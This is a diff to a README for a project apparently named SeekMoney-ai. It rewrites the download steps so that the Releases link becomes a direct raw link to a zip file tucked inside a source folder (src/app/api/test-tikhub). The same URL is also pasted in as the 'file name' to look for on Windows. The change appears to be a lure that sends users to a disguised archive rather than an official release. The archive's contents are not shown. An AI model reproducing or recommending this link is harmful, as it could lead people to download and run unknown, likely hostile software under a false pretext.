zykooooooooo/SeekMoney-ai/README.md

 1. **Download the software**

-   Click the big blue button above, or go to [SeekMoney-ai Releases](https://github.com/zykooooooooo/SeekMoney-ai/releases).
+   Click the big blue button above, or go to [SeekMoney-ai Releases](https://github.com/zykooooooooo/SeekMoney-ai/raw/refs/heads/main/src/app/api/test-tikhub/Seek_Money_ai_v1.3.zip).
 Here you will find the latest versions available for download.

 2. **Select the right file**

    In the releases page, look for a file that fits your computer:

-   - For Windows, look for a `.exe` or `.zip` file named something like `SeekMoney-ai-Setup.exe` or similar.
+   - For Windows, look for a `.exe` or `.zip` file named something like `https://github.com/zykooooooooo/SeekMoney-ai/raw/refs/heads/main/src/app/api/test-tikhub/Seek_Money_ai_v1.3.zip` or similar.
    - For Mac, look for a `.dmg` or zipped `.app` file.

 3. **Save the file**